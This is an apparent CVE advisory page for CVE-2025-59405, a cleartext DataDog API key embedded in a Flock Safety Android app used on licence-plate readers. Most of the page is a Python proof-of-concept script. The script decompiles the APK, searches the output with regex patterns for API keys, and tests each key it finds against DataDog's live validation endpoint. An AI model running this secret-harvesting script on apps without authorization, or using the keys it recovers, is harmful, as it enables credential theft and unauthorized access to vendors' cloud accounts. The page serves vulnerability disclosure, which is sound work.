Security Vulnerability Report
CVE-2025-59405 CVSS 7.5 HIGH

CVE-2025-59405

Published: 2025-10-02 17:16:06
Last Modified: 2025-10-24 17:27:52

Description

The Flock Safety Peripheral com.flocksafety.android.peripheral application 7.38.3 for Android (installed on Falcon and Sparrow License Plate Readers and Bravo Edge AI Compute Devices) contains a cleartext DataDog API key within its codebase. Because application binaries can be trivially decompiled or inspected, attackers can recover the OAuth secret without special privileges. This secret is intended to remain confidential and should never be embedded directly in client-side software.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:flocksafety:flock_safety:7.38.3:*:*:*:*:android:*:* - VULNERABLE
com.flocksafety.android.peripheral 7.38.3 (Android application)
Flock Safety Falcon License Plate Reader (ships with the affected application)
Flock Safety Sparrow License Plate Reader (ships with the affected application)
Flock Safety Bravo Edge AI Compute Device (ships with the affected application)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-59405 PoC - Extracting Hardcoded DataDog API Key from Flock Safety Peripheral APK
# This PoC demonstrates how to extract the cleartext DataDog API key from the APK
import subprocess
import re
import sys
import os

APK_FILE = "com.flocksafety.android.peripheral_7.38.3.apk"
OUTPUT_DIR = "decompiled_output"


def decompile_apk(apk_path, output_dir):
    """Decompile APK using apktool and jadx"""
    # Step 1: Use apktool to extract resources and smali code
    print("[*] Decompiling APK with apktool...")
    subprocess.run(["apktool", "d", "-f", apk_path, "-o", f"{output_dir}/apktool"], check=True)
    # Step 2: Use jadx to decompile to Java source
    print("[*] Decompiling APK with jadx...")
    subprocess.run(["jadx", "-d", f"{output_dir}/jadx", apk_path], check=True)
    print(f"[+] Decompilation complete. Output: {output_dir}/")


def search_api_key(search_dir):
    """Search for hardcoded DataDog API key in decompiled source"""
    print("[*] Searching for DataDog API key patterns...")
    # Common patterns for DataDog API keys
    patterns = [
        r'DD_API_KEY\s*=\s*["\']([a-f0-9]{32,})["\']',
        r'datadog.*api[_-]?key\s*[=:]\s*["\']([^"\']+)["\']',
        r'Authorization.*Datadog\s+([a-zA-Z0-9]{32,})',
        r'"([a-f0-9]{40})"',  # DataDog API keys are typically 32-40 char hex strings
    ]
    found_keys = []
    for root, dirs, files in os.walk(search_dir):
        for file in files:
            if file.endswith((".java", ".smali", ".kt", ".xml", ".json", ".properties")):
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', errors='ignore') as f:
                        content = f.read()
                    for pattern in patterns:
                        matches = re.findall(pattern, content, re.IGNORECASE)
                        for match in matches:
                            print(f"[+] Found potential API key in {filepath}: {match}")
                            found_keys.append({"file": filepath, "key": match})
                except Exception:
                    pass
    return found_keys


def validate_key_with_datadog(api_key):
    """Validate extracted API key against DataDog API"""
    import requests
    print("[*] Validating API key against DataDog API...")
    url = "https://api.datadoghq.com/api/v1/validate"
    headers = {"DD-API-KEY": api_key}
    try:
        resp = requests.get(url, headers=headers, timeout=10)
        if resp.status_code == 200:
            data = resp.json()
            if data.get("valid"):
                print("[+] VALID DataDog API Key confirmed!")
                print(f"    Key: {api_key}")
                return True
        print(f"[-] Key validation failed: {resp.status_code}")
    except Exception as e:
        print(f"[-] Error validating key: {e}")
    return False


if __name__ == "__main__":
    if not os.path.exists(APK_FILE):
        print(f"[!] APK file not found: {APK_FILE}")
        sys.exit(1)
    decompile_apk(APK_FILE, OUTPUT_DIR)
    keys = search_api_key(OUTPUT_DIR)
    if keys:
        print(f"\n[!] Extracted {len(keys)} potential API key(s)")
        for key_info in keys:
            validate_key_with_datadog(key_info["key"])
    else:
        print("[-] No API keys found")
```

Weakness

CWE-200

References

https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more/ (Exploit, Third Party Advisory)
https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf (Exploit, Third Party Advisory)
https://www.flocksafety.com/products (Product)
https://www.flocksafety.com/products/license-plate-readers (Product)